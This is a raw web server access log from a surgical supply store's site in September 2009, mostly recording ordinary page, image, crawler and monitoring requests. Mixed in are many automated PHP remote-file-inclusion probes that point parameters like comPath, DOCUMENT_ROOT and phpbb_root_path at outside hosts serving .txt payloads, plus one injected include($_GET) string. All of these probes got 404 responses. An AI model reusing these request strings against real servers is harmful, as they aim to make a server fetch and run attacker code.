88.238.29.36 - - [12/Sep/2009:02:17:50 -0400] "GET /images/items/ALLOOSS1_THUMB.JPG HTTP/1.1" 200 30054 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:50 -0400] "GET /images/items/ALLOOSS2_THUMB.JPG HTTP/1.1" 200 2001 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:52 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:52 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:52 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:52 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:52 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:52 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:52 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:52 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:52 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:52 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
123.125.66.117 - - [12/Sep/2009:02:17:52 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
88.238.29.36 - - [12/Sep/2009:02:17:52 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.59.12.99 - - [12/Sep/2009:02:18:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.238.29.36 - - [12/Sep/2009:02:18:36 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:18:36 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
98.174.154.206 - - [12/Sep/2009:02:19:15 -0400] "GET /logs/access_log.Q109062100//nucleus/xmlrpc/server.php? HTTP/1.1" 404 251 "-" "libwww-perl/5.814"
98.174.154.206 - - [12/Sep/2009:02:19:16 -0400] "GET /logs/access_log.Q109062100//nucleus/xmlrpc/server.php? HTTP/1.1" 404 251 "-" "libwww-perl/5.814"
98.174.154.206 - - [12/Sep/2009:02:19:16 -0400] "GET //nucleus/xmlrpc/server.php? HTTP/1.1" 404 224 "-" "libwww-perl/5.814"
98.174.154.206 - - [12/Sep/2009:02:19:16 -0400] "GET //nucleus/xmlrpc/server.php? HTTP/1.1" 404 224 "-" "libwww-perl/5.814"
98.174.154.206 - - [12/Sep/2009:02:19:16 -0400] "GET /logs//nucleus/xmlrpc/server.php? HTTP/1.1" 404 229 "-" "libwww-perl/5.814"
98.174.154.206 - - [12/Sep/2009:02:19:16 -0400] "GET /logs//nucleus/xmlrpc/server.php? HTTP/1.1" 404 229 "-" "libwww-perl/5.814"
69.175.44.226 - - [12/Sep/2009:02:19:47 -0400] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
69.175.44.226 - - [12/Sep/2009:02:19:47 -0400] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
69.175.44.226 - - [12/Sep/2009:02:19:47 -0400] "GET /logs/access_log.Q109052500///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.175.44.226 - - [12/Sep/2009:02:19:48 -0400] "GET /logs/access_log.Q109051700///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
67.218.116.164 - - [12/Sep/2009:02:20:35 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.110.11.75 - - [12/Sep/2009:02:20:49 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path[docroot]=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:02:20:49 -0400] "GET //newspublish/include.php?path[docroot]=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:02:20:50 -0400] "GET /logs//newspublish/include.php?path[docroot]=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.172.33.230 - - [12/Sep/2009:02:20:56 -0400] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.812"
209.172.33.230 - - [12/Sep/2009:02:20:56 -0400] "GET /logs/access_log.Q109081200//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.812"
209.172.33.230 - - [12/Sep/2009:02:20:56 -0400] "GET //administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.812"
209.172.33.230 - - [12/Sep/2009:02:20:56 -0400] "GET /logs/error_log.Q109081200//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.812"
211.110.11.75 - - [12/Sep/2009:02:21:06 -0400] "GET /logs/access_log.Q109071300//newspublish/include.php?path[docroot]=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
67.218.116.132 - - [12/Sep/2009:02:21:08 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
98.174.154.206 - - [12/Sep/2009:02:21:15 -0400] "GET /logs/error_log.Q109062100//nucleus/xmlrpc/server.php? HTTP/1.1" 404 250 "-" "libwww-perl/5.814"
98.174.154.206 - - [12/Sep/2009:02:21:15 -0400] "GET /logs/error_log.Q109062100//nucleus/xmlrpc/server.php? HTTP/1.1" 404 250 "-" "libwww-perl/5.814"
121.78.116.209 - - [12/Sep/2009:02:21:25 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.94.26.182 - - [12/Sep/2009:02:21:38 -0400] "GET /logs/start.php?pag=http://www.cyber-marche.fr/media/fx29id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.94.26.182 - - [12/Sep/2009:02:21:38 -0400] "GET /start.php?pag=http://www.cyber-marche.fr/media/fx29id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.94.26.182 - - [12/Sep/2009:02:21:38 -0400] "GET /logs/access_log.Q109083000/start.php?pag=http://www.cyber-marche.fr/media/fx29id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
98.174.154.206 - - [12/Sep/2009:02:22:05 -0400] "GET /start.php?pag=http://www.cyber-marche.fr/media/fx29id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
98.174.154.206 - - [12/Sep/2009:02:22:05 -0400] "GET /logs/start.php?pag=http://www.cyber-marche.fr/media/fx29id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
98.174.154.206 - - [12/Sep/2009:02:22:06 -0400] "GET /logs/access_log.Q109083000/start.php?pag=http://www.cyber-marche.fr/media/fx29id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
204.30.3.225 - - [12/Sep/2009:02:22:10 -0400] "GET /logs/access_log.Q109072100//index.php?option=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.26.182 - - [12/Sep/2009:02:22:58 -0400] "GET /logs/access_log.Q109083000%20%20/start.php?pag=http://www.cyber-marche.fr/media/fx29id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:02:23:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.175.44.226 - - [12/Sep/2009:02:23:36 -0400] "GET /logs/access_log.Q109052500%20%20///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.175.44.226 - - [12/Sep/2009:02:23:36 -0400] "GET /logs/access_log.Q109051700%20%20///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
98.174.154.206 - - [12/Sep/2009:02:23:45 -0400] "GET /logs/access_log.Q109083000%20%20/start.php?pag=http://www.cyber-marche.fr/media/fx29id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.94.26.182 - - [12/Sep/2009:02:23:47 -0400] "GET /logs/access_log.Q109052900%20%20/start.php?pag=http://www.cyber-marche.fr/media/fx29id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
118.107.162.36 - - [12/Sep/2009:02:23:53 -0400] "GET //administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
118.107.162.36 - - [12/Sep/2009:02:23:53 -0400] "GET /logs/access_log.Q109081200//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
118.107.162.36 - - [12/Sep/2009:02:23:54 -0400] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
118.107.162.36 - - [12/Sep/2009:02:23:57 -0400] "GET /logs/error_log.Q109081200//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
209.172.33.230 - - [12/Sep/2009:02:24:03 -0400] "GET /logs/access_log.Q109081200%20//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.812"
98.174.154.206 - - [12/Sep/2009:02:24:13 -0400] "GET /logs/access_log.Q109052900%20%20/start.php?pag=http://www.cyber-marche.fr/media/fx29id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
208.116.50.218 - - [12/Sep/2009:02:26:34 -0400] "GET //trans/trans.php?trans=eng&page=http://mecalibre.fr/zfxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
208.116.50.218 - - [12/Sep/2009:02:26:34 -0400] "GET /logs//trans/trans.php?trans=eng&page=http://mecalibre.fr/zfxid.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
208.116.50.218 - - [12/Sep/2009:02:26:34 -0400] "GET /logs/access_log.Q109081200%20%20//trans/trans.php?trans=eng&page=http://mecalibre.fr/zfxid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
208.116.50.218 - - [12/Sep/2009:02:26:36 -0400] "GET /logs/access_log.Q109070400%20%20//trans/trans.php?trans=eng&page=http://mecalibre.fr/zfxid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:02:28:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.6.216.226 - - [12/Sep/2009:02:28:42 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:28:42 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:28:45 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:28:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:29:57 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76380 "http://www.acesurgical.com/glustitch.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:29:57 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76380 "http://www.acesurgical.com/glustitch.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:02 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:02 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:02 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:02 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:02 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:02 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:02 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:02 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:02 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:02 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:03 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:03 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:03 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
118.107.162.36 - - [12/Sep/2009:02:30:06 -0400] "GET /logs/access_log.Q109081200%20//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
61.6.216.226 - - [12/Sep/2009:02:30:08 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:08 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:08 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:08 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:12 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:12 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:12 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:12 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:12 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:12 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:12 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:12 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:12 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:12 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
61.6.216.226 - - [12/Sep/2009:02:30:12 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
190.144.44.36 - - [12/Sep/2009:02:30:15 -0400] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
